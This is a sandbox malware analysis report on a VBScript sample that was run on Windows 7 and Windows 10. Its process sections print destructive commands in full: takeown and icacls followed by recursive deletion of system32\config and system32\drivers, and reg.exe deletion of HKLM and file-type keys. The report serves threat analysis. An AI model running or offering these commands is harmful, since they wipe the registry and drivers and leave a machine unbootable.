Malware Analysis Report

2024-11-16 12:53

Sample ID 240815-1j5qnawdrd
Target file01.vbs
SHA256 d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e

Threat Level: Likely malicious

The file file01.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry class

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:41

Reported

2024-08-15 21:44

Platform

win7-20240708-en

Max time kernel

117s

Max time network

118s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2156 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2156 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2384 wrote to memory of 2736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2736 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2812 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2812 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2384 wrote to memory of 2812 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2736 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2736 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2736 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2812 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2812 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2812 wrote to memory of 2648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2736 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2736 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2736 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2812 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2812 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2812 wrote to memory of 1644 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs

MD5 fefe72db31bfdbe4a0ae7f11cb852008
SHA1 a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256 d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512 a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0

C:\Users\Admin\Desktop\CompleteSave.vbs

MD5 355d25ae00d82afebe47bffcaa713a40
SHA1 c6790a7e5d81ad3d1149974c75947d3b2509f544
SHA256 93ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
SHA512 08d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa

C:\Users\Admin\Music\WritePop.ogg

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:41

Reported

2024-08-15 21:44

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

155s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1408 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 1408 wrote to memory of 3920 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 3920 wrote to memory of 440 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3920 wrote to memory of 440 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3920 wrote to memory of 4296 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3920 wrote to memory of 4296 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 4296 wrote to memory of 3464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4296 wrote to memory of 3464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 440 wrote to memory of 3692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 440 wrote to memory of 3692 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 440 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 440 wrote to memory of 4136 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4296 wrote to memory of 4744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 4296 wrote to memory of 4744 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3920 wrote to memory of 4824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 4824 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 3092 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3920 wrote to memory of 2388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file01.wsf C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.exe

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKLM\*

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\file01.wsf.vbs

MD5 fefe72db31bfdbe4a0ae7f11cb852008
SHA1 a43900d8e5e5c0a6b8af5c7468080dffd88aacbc
SHA256 d5100abb8ddc4b07777387a291bfbf7c27530c8a1457b391bd15ffa441db2c5e
SHA512 a3f8fa70e1266d318e61d779c999657691ab919e46b25b2a9dc06afe627bc66667e1c6d6cc8f33f32ec85638756124e90ab0890b2b7fde5430f82c47aeaf51b0

C:\Users\Admin\Desktop\desktop.vbs

MD5 355d25ae00d82afebe47bffcaa713a40
SHA1 c6790a7e5d81ad3d1149974c75947d3b2509f544
SHA256 93ac1d1665ee61e357aa40a09b1671be28e8c662d5d7601fb6156f1eafcb018c
SHA512 08d5b20fb2d6720c47ff5bc3cbb1ac5f7d8090bb014c13cf2da1c7f8da991ae6b1cf4d8b67aebd7d17077defe5845509dd95963c5d524a1cda79b782e247d4fa